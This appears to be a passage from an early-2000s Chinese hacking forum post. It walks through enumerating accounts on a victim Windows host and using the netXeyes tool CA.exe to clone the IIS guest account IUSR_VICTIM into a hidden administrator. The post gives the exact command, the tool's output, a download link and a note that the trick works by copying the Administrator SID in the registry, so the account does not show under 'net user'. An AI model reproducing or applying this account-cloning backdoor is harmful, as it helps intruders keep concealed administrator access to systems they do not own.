Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators
Disconnect Host 192.168.0.1 ....OK
3、利用CA.exe 将Iusr_victim克隆为Administrator。
C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn.com
Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK
User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User's comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02
Logon hours allowed All
Local Group Memberships *Guests
Global Group memberships *None
下载: http://www.netXeyes.org/CA.exe
--------------------
上文是在小榕那里找的。自己看看吧。希望对你有用。
其实原理也不是很难。只是一个SID而已。
在注册表里改成与ADMINISTRATOR一样的,但是在DOS下NET USER administrator时不会显示他而已。但是实际权限却与adminsitrator是一样的。:)呵呵,小弟也是刚刚学的。如果可以的话,大家一起学习吧。
嘿嘿~~~走了!